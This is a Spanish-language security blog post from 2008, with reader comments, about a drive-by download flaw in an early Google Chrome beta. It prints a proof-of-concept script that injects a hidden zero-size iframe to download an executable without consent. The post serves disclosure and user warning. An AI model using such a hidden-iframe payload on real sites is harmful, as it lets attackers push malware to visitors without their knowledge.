Muy Bonito, Muy de la Casa, MUY INSEGURO

4 septiembre 2008 16 Comentarios


El Nuevo de puede ser muy rápido, muy bonito, consumir poca memoria, tener muchas funciones “WoW” pero en estos 2 días ha demostrado que es muy inseguro hoy me entero gracias a un comentario de exactlimon sobre un nuevo fallo en que permite (de cualquier tipo) sin el consentimiento del usuario.

Este fallo descubierto nerex y publicado en milw0rm.com consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.

<script>
document.write('<iframe src="http://www.dragonjar.org/calc.exe" frameborder="0" width="0" height="0">');
</script>

He subido una prueba de concepto al servidor con la calculadora de windows y  haciendo click aquí obtendrás algo parecido a esto.

chrome2nk7 Muy Bonito, Muy de la Casa, MUY INSEGURO

El archivo no se ejecuta, pero estoy seguro que con otro nombre e icono mas llamativos muchos lo abrirían solo por “curiosidad”, al parecer Google se ha dado cuenta de la cantidad de errores que tiene su navegador y ha dejado de promocionarlo en su pagina principal actualizado, han vuelto a promocionarlo en la pagina principal de google.

chromejg9 Muy Bonito, Muy de la Casa, MUY INSEGURO

La version afectada con este y los otros fallos de seguridad mencionados anteriormente en el portal es la 0.2.149.27 les recomiendo que no utilicen este navegador al menos hasta que salga una nueva versión con estos problemas solucionados.

Mas Información:
http://milw0rm.com/exploits/6355
Primera Vulnerabilidad en Google Chrome
Nueva Vulnerabilidad en Google Chrome

Si te ha gustado el post, compartelo y ayudanos a crecer.

Unete a nuestra FanpageSiguenos en Twitter

También puede interesarte...

Twitter Digg Delicious Stumbleupon Technorati Facebook Email
Noticias Seguridad, Seguridad Web
, , , , , ,

Acerca de DragoN

Ingeniero en Sistemas y Telecomunicaciones de la Universidad de Manizales. Consultor Independiente de Seguridad Informática con más de 7 años de experiencias en Ethical Hacking, Pen Testing y Análisis Forense. Speaker y Organizador de diferentes eventos de Seguridad Informática y Creador de La Comunidad DragonJAR, una de las comunidades de seguridad informática mas grandes de habla hispana y referente en el sector.
Ver todos los artículos de DragoN

16 Respuestas para “Muy Bonito, Muy de la Casa, MUY INSEGURO”

  1. exactlimon Responder 4 septiembre 2008 en 11:58 AM
    sisas parse, yo ya no lo vuelvo a usar, o si lo uso solo lo hago con paginas que yo conozco,
    y eso que con la duda…

    ya que usted dice que un .exe , pero si es en forma de autorun??

  2. Basa Responder 4 septiembre 2008 en 11:58 AM
    jaja yo ya lo comprobado lo descarge el primer día que salio, pero no me gusta tanto, algo le falta para que me llame la atencion pero no se. y gracias por abisar que es inseguro
  3. silencioso Responder 4 septiembre 2008 en 2:15 PM
    se puede evitar esto desde las opciones en la pestaña especificas seleccionando “pedir ubicación antes de la descarga” pregunta si se quiere guardar el archivo o no y permite evitar este problema
  4. Oskar Responder 4 septiembre 2008 en 2:17 PM
    No olvidaros que tan solo es una beta… no es una versión final…
  5. NewDanger Responder 4 septiembre 2008 en 3:34 PM
    No se tanto si es una falla de seguridad. Recordemos ke incluso firefox viene con la opción para descargar directamente un archivo al hacer click en el link.
    Para deshabilitar esta opción en Google Chrome la en: Opciones >> Especificas >> Pedir ubicación antes de la descarga. Y listo, incluso con ese script nos pide confirmación.
    (Que en verdad lo unico que hace ese javascript es crear un iframe que llama al archivo, no es nada magico, es como entrar nosotros mismos a ese archivo)
  6. ElectroN Responder 4 septiembre 2008 en 6:07 PM
    Bueno, Al parecer o quitaron la publicidad de su pagian principal por valla yo a saber que.
    Tal vez alguna actualizacion de servidor de descarga o tal vez ya estan parcheados los primeros fallos de seguridad. bueno en fin ya esta de nuevo la publicidad en su pagina principal,
    No crean que se van a rendir tan facil, que a el primer incoveniente ya lo quitan y nada mas!!
  7. Prestamos Personales Responder 4 septiembre 2008 en 9:25 PM
    No creo que por estos fallos que presenta un producto “beta” hay que crucificar a Google, es un primer intento y creo que han avanzado mucho en esto, y aparte no considero que la finalidad de Google sea solo mantener el mismo como un simple navegador mas, creo que la propuesta es algo mas de esto, por como Google viene manejandose, cual seria el interes por solo mostrar un navegador simple y sencillamente, o se olvidan que Google le aporta financieramente a Firefox, considero que hay que esperar un tiempo mas a ver que se trae Google con este navegador.
  8. DragoN Responder 5 septiembre 2008 en 1:31 PM
    @NewDanger el problema es que no se le da click en ningún vinculo, el descarga la aplicación sin preguntar… (y asi viene por defecto)

    en cuanto a justificarse por que es “Beta”… pues no me parece… todos los productos de Google son “Betas”, las “Betas” en este mundo 2.0 significa que el software esta en constante cambio, no que sea un producto de pruebas.

    Google News… lleva mas de 4 años en beta..
    GMail… varios años en beta

    Todo lo de google es beta y no se justifica un fallo de esta magnitud, sumado a los muchos otros que han detectado http://groups.google.com/group/chromium-bugs/

  9. Matìas Responder 5 septiembre 2008 en 5:26 PM
    Bueno recien anoche me descargue el chrome, como diseñador gráfico me parece excelente, siempre pensé en diseñar un navegador con mìnimos botones. Un defecto que encuentro en el diseño es que cuando uno posa el cursor para ver adónde se dirigirá el navegador al clickearlo no muestra la direcciòn completa como si sucede en IE. El resto me parece bien aunque yo agregaria un reloj al descargar las pàginas porque cuando las carga, si bien lo hace rápido el poco tiempo que tarda no aclara nada y parece que se cuelga… ademas, que en cada enlace en el que entremos abra una nueva ventana puede llegar a ser engorroso dependiendo de qué modo acostumbremos a navegar. Por lo demàs, acabo de bloquear las descargas automáticas las cookies y todo! x las dudas :P
  10. Pattty Responder 6 septiembre 2008 en 1:52 PM
    Lo descargué pero hasta la fecha no lo he instalado ni probado, y siendo asi, tampoco creo que lo haga :D
  11. julio Responder 8 septiembre 2008 en 10:03 AM
    si Dragon dice que es malo , es malo =) ,jeje la verdad me gusta el g chrome, pero tocara esperar a que lo “fixeen” =) , saludos a todos desde Cucuta.
  12. cacom2 Responder 10 septiembre 2008 en 11:36 AM
    jajajaja lo volviereon a kitar de la pagina de google, ke malesa!!!
  13. ZoiX Responder 11 septiembre 2008 en 9:21 PM
    ¿Y por qué en vez de no usarlo no se pone que pregunte en dónde guardar antes de descargar?
  14. 0m3g4 Responder 8 febrero 2009 en 6:34 PM
    Pues de hecho el navegador no me pareció malo, pero tampoco es la gran cosa, además tiene otro detalle y es que en ocasiones cancela ingreso al correo, es decir, te logeas, pero te deja en espera, se queda cargando y puedes darle todos los F5 que quieras que igual no pasará nada hasta que resetees la PC.

    Y ahora viendo esto, definitivamente, no, fuera de servicio.

  15. zfr Responder 5 enero 2010 en 9:14 PM
    Nunca me gusto ese navegador, nunca me dio confianza. Cuando lo use se colgaba con frecuencia y no es tan rapido como dicen. El diseño es excesivamente minimalista y se le hechan en faltan algunas opciones adicionales sobre todo en lo referente a la seguridad.
    De los 5 navegadores principales: ie, firefox, opera, safari, chrome es el mas inseguro y el que menos opciones tiene. Prefiero 1000 veces a opera.
  16. sergi Responder 7 febrero 2010 en 10:14 PM
    a mi si me gusta y es el navegador que mas uso , el internet exploter es inestable lento pero seguro, el firefox morcilla es muy bueno pero vengo notando que el arranque le esta tomano bastante tiempo.

Dejar un Comentario